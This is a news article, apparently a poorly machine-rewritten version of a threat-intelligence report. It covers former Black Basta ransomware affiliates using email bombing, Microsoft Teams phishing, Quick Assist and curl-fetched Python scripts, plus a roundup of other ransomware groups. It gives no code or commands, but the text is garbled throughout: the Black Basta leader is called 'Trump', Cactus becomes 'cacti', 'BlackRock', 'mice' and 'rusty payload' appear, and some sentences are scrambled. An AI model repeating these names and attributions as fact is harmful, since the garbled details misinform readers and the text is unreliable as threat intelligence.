It has been observed that former members associated with Blackbustaroransomware operations are stuck with the trial and error approach of email bombing and Microsoft teams in phishing to establish persistent access to the target network.
“Recently, attackers introduced Python script execution along with these techniques and deployed malicious payloads using Curl requests,” ReliaQuest said in a report shared with Hacker News.
The development is a sign that threat actors continue to pivot and reorganize despite the Black Busta brand suffering a major blow and decline following the leak of internal chat logs this early February.
The cybersecurity company said half of the team’s phishing attacks observed between February and May 2025 came from the onmicrosoft (.)com domain, with the compromised domain accounting for 42% of the attacks over the same period. The latter is much more stealthy, allowing threat actors to impersonate legal traffic in attacks.
Just like last month, ReliaQuest’s financial and insurance sector and construction customers are being targeted using team phishing that tricks unsuspecting users into pretending to be help desk personnel.
“The closure of Black Basta’s data leak site indicates that despite the continued use of its tactics, it is likely that the previous affiliates have moved to another Raas group or formed a new group,” the company added. “The most likely scenario is that a former member has joined the Cactus Raas group, evidenced by Trump, the leader of Black Busta, who refers to a $500-600,000 payment to Cactus in leaked chats.”
That said, it is worth noting that since March 2025, cacti have not named organizations in data leak sites. This indicates that the group has either broken up or intentionally attempts to avoid attracting attention to themselves. Another possibility is that affiliates have moved to BlackRock. This is believed to have begun working with a ransomware cartel named Dragonforce.
Threat actors also leverage access obtained through team phishing techniques to leverage access to the first remote desktop session via Quick Assist and anyDesk, download malicious Python scripts from the remote address and run to establish command and control (C2) communication.
“The use of Python scripts in this attack highlights evolving tactics that are likely to become more common in future team phishing campaigns in the near future,” ReliaQuest said.
Black Busta Style’s social engineering strategy, which uses a combination of email spam, team phishing and quick assist, finds takers within the Black Suit ransomware group, increasing the likelihood that Black Suit affiliates have either embraced the group’s approach or absorbed group members.
According to Rapid7, initial access serves as a pathway to download and run the updated variants of Java-based rats that were previously deployed to serve as a qualified harvester for Black Basta Attacks.
“Java Malware abuses the cloud-based file hosting services that both Google and Microsoft provide to proxy commands through their respective cloud service provider (CSP) servers,” the company says. “As time passed, malware developers have recently moved to using Google Drive, heading towards direct proxy connections (i.e., configuration options left blank or not present), OneDrive and Google Sheets.”
A new iteration of malware transfers files between the infected host and the remote server, starts a Socks5 proxy tunnel, steals credentials stored in a web browser, presents a fake Windows login window, downloads Java classes from the included URL and runs them in memory.
Like the 3am ransomware attack detailed by Sophos a few weeks ago, the intrusion is also characterized by the use of tunneling backdoors called Qdoor, a malware previously attributed to black suits, and the use of a custom loader of SSH utility and a rusty payload of python rats called Anubis.
Findings arise among many developments in ransomware landscapes –
- The financially motivated group known as scattered spiders targets managed service providers (MSPs) and IT vendors as part of a “one-to-manager” approach that permeates multiple organizations through a single compromise.
- Scattered Spider bypassed Multi-Factor Authentication (MFA) using the Evilginx Phishing kit and used forging strategic alliances with leading ransomware operators such as Alphv (aka Blackcat), Ransomhub), and Dragonforce to create fake login pages.
- Qilin (aka Agenda and Phantom Mantis) ransomware operators launched a coordinated intrusion campaign targeting several organizations between May and June 2025 by weaponizing Fortinet Fortigate vulnerabilities (such as CVE-2024-21762 and CVE-2024-55591) for initial access.
- The play (aka BalloonFly and PlayCrypt) ransomware group is estimated to have compromised 900 entities in May 2025 in the mid-May 2025. Some attacks have leveraged SimpleHelp’s flaws (CVE-2024-57727) to target many US-based entities after the vulnerability is revealed.
- The administrator of the Vanhelsing Ransomware Group leaked the entire source code for the Ramp Forum, citing an internal dispute between developers and leadership. Leaked details include blogs with TOR keys, ransomware source code, administrator web panels, chat systems, file servers, and a complete database per product.
- The Interlock Ransomware Group deployed a previously undocumented JavaScript Remote Access Trojan as part of an attack targeting UK local governments and higher education organizations in January and March 2025.
“The rat allows attackers to remotely control infected systems, access files, monitor activity and manipulate system settings,” said Quorum Cyber. “Threat actors can use mice to maintain persistence within their organization, deploy additional tools and malware in their environments, and also access, manipulate, destroy, or remove data.”
